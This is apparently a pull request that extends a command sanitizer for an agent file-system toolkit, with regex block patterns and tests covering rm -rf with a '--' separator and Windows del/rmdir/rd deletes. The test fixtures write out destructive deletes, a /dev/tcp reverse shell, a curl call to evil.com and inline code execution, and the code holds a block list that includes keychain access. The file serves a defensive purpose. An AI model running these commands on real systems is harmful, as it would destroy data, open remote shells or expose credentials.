### PR TITLE
fix(command_sanitizer): handle rm -- separator and add Windows delete coverage

### DIFF
--- a/tools/src/aden_tools/tools/file_system_toolkits/command_sanitizer.py
+++ b/tools/src/aden_tools/tools/file_system_toolkits/command_sanitizer.py
@@ -87,6 +87,8 @@ _BLOCKED_EXECUTABLES: list[str] = [
     "regsvr32",
     # Credential / secret access
     "security",  # macOS keychain: security find-generic-password
+    # Windows rmdir alias
+    "rd",
 ]
 
 # Patterns matched against the full (joined) command string.
@@ -94,10 +96,11 @@ _BLOCKED_EXECUTABLES: list[str] = [
 # executable itself isn't blocked (e.g. python -c '...').
 _BLOCKED_PATTERNS: list[re.Pattern[str]] = [
     # rm with force/recursive flags targeting root or broad paths
-    re.compile(r"\brm\s+(-[rRf]+\s+)*(/|~|\.\.|C:\\)", re.IGNORECASE),
+    # Matches: rm -rf /, rm -fr /, rm -rf -- /, etc.
+    re.compile(r"\brm\s+(?:-[rRf]+\s+)*(?:--\s+)?(?:/|~|\.\.|\bC:\\)(?:\s|$)", re.IGNORECASE),
     # del /s /q (Windows recursive delete)
-    re.compile(r"\bdel\s+.*/[sS]", re.IGNORECASE),
-    re.compile(r"\brmdir\s+/[sS]", re.IGNORECASE),
+    re.compile(r"\bdel\s+.*/[sS]\s", re.IGNORECASE),
+    re.compile(r"\brmdir\s+/[sS]\s", re.IGNORECASE),
     # dd writing to disks/partitions
     re.compile(r"\bdd\s+.*\bof=\s*/dev/", re.IGNORECASE),
     # chmod 777 / chmod -R 777

--- a/tools/tests/test_command_sanitizer.py
+++ b/tools/tests/test_command_sanitizer.py
@@ -146,12 +146,24 @@ class TestBlockedPatterns:
             "rm -rf ..",
             "rm -rf C:\\",
             "rm -f -r /",
+            # rm with -- separator (attempt to bypass)
+            "rm -rf -- /",
+            "rm -fr -- /",
+            # Windows del variants
+            "del /S /Q C:\\Windows",
+            "del /F /S /Q important.txt",
+            # Windows rmdir variants
+            "rmdir /S /Q C:\\Program Files",
+            # Windows rd alias (shorthand for rmdir)
+            "rd /s /q C:\\",
+            "rd /s C:\\temp",
             # sudo
             "sudo apt install something",
             "sudo rm -rf /var/log",
             # Inline code execution
             "python -c 'import os; os.system(\"rm -rf /\")'",
             'python3 -c \'__import__("os").system("id")\'',
+            "node -e 'require(\"fs\").rmSync(\"/\")'",
             # Reverse shell indicators
             "bash -i >& /dev/tcp/10.0.0.1/4444",
             # Credential theft
@@ -251,3 +263,69 @@ class TestEdgeCases:
         """Blocked commands should include a useful error message."""
         with pytest.raises(CommandBlockedError, match="blocked for safety"):
             validate_command("curl http://evil.com")
+
+
+class TestFalsePositives:
+    """Benign text that should NOT trigger false positives."""
+
+    @pytest.mark.parametrize(
+        "cmd",
+        [
+            # Comments or documentation mentioning dangerous commands
+            "# curl is used for fetching files",
+            "# TODO: use bash to script this",
+            "echo 'Reading curl documentation'",
+            'echo "The rm -rf command is dangerous"',
+            # Benign uses in string context
+            "grep -r 'rm -rf' docs/",
+            "grep 'del /S' README.md",
+            # Node.js scripts without -e flag
+            "node server.js",
+            "node --version",
+            "node dist/app.js --port 3000",
+            # Python without -c flag
+            "python script.py",
+            "python -m pytest tests/",
+            "python3 setup.py build",
+            # Ruby, Perl without -e flag
+            "ruby script.rb",
+            "perl script.pl",
+            # Paths / files containing keywords
+            "cat bash_config.sh",
+            "cat /usr/local/bin/node",
+            "ls -la .bashrc",
+            # Windows safe commands
+            "dir /S Documents",
+            "copy file1.txt file2.txt",
+            "move old.txt new.txt",
+        ],
+    )
+    def test_benign_text_does_not_block(self, cmd):
+        """Benign uses of keywords in comments/text should not be blocked."""
+        validate_command(cmd)  # should not raise
+
+    def test_node_without_e_flag_is_safe(self):
+        """node script.js is safe; only node -e is blocked."""
+        validate_command("node app.js")
+        validate_command("node --version")
+        validate_command("node -p 'process.version'")  # -p is a REPL, not -e
+
+    def test_rd_executable_is_blocked(self):
+        """Windows rd (alias for rmdir) should be blocked."""
+        with pytest.raises(CommandBlockedError):
+            validate_command("rd /s /q C:\\")
+
+    @pytest.mark.parametrize(
+        "cmd",
+        [
+            # del with various flag combinations
+            "del /S /Q C:\\temp\\*.*",
+            "del /F /S /Q important.txt",
+            # rmdir with /S (recurse)
+            "rmdir /S C:\\empty",
+        ],
+    )
+    def test_windows_delete_variants_blocked(self, cmd):
+        """Windows delete variants with recursive flags should be blocked."""
+        with pytest.raises(CommandBlockedError):
+            validate_command(cmd)


### PR DESCRIPTION
Fixes #6734

## Description

This PR improves `command_sanitizer` coverage for a narrow set of destructive command edge cases.

## Changes

- handle `rm -rf -- /` and similar short-flag variants with an optional `--` separator
- add `rd` as a blocked Windows `rmdir` alias
- add tests for Windows delete variants:
  - `del /F /S /Q`
  - `rmdir /S /Q`
  - `rd /s /q`
- add false-positive tests for benign text inputs

## Validation

- `C:\Users\ronal\.local\bin\uv.exe run pytest tools/tests/test_command_sanitizer.py -v`
- result: `146 passed`

## Notes

- scope is intentionally small
- long-flag forms such as `--recursive` remain out of scope
- no broader sanitizer policy changes are introduced